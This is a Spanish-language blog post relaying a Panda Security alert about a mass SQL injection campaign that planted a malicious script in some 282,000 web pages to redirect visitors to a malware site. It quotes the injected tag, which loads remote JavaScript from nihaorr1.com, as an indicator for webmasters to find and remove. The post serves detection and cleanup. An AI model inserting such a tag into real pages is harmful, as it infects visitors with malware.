Panda Security recomienda comprobar la integridad de las páginas web, debido a un ataque masivo.

Según una alerta de la compañía de seguridad española, Panda Security, una vulnerabilidad en servidores Internet Information Server de Microsoft puede permitir a los ciberdelincuentes inyectar código SQL para manipular páginas web legitimas, de forma que redirigen a los visitantes a un sitio web malicioso diseñado para instalar todo tipo de malware en el ordenador.

Al menos 282.000 páginas de todo tipo, incluyendo algunas correspondientes a prestigiosas instituciones de todo el mundo, ya han sido manipuladas, si bien el número sigue aumentando.

El ataque se detecta fácilmente, ya que requiere la presencia de una cadena de código muy específica insertada en el código fuente de la página, asociada a una etiqueta IFRAME. Dicha cadena es:<script src=http://www.nihaorr1.com/1.js>. Recomienda la revisión de las páginas a todos los webmaster.

En caso de detectarla, hay que proceder a su eliminación inmediata y avisar a la persona o empresa encargadas de la gestión del servidor donde se alojan las páginas, para que proceda a tomar las medidas de seguridad pertinentes.

Dado el alto número de páginas afectadas, muchos usuarios han podido verse infectados por todo tipo de códigos maliciosos, incluso de nueva creación y por tanto, desconocidos para las compañías de seguridad.

Hay que tener en cuenta que esta vulnerabilidad que anuncia Panda Security no es especifica de las tecnologías de Microsoft, sino que las inyecciones de SQL, se pueden realizar en otros servidores de páginas, es más un caso de malas practicas en los desarrollos de las páginas Web.

A los usuarios les recomiendo como siempre que mantengan sus antivirus al día, pues seguramente todos ellos irán actualizando en las próximas horas sus bases de datos.

Anuncios

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s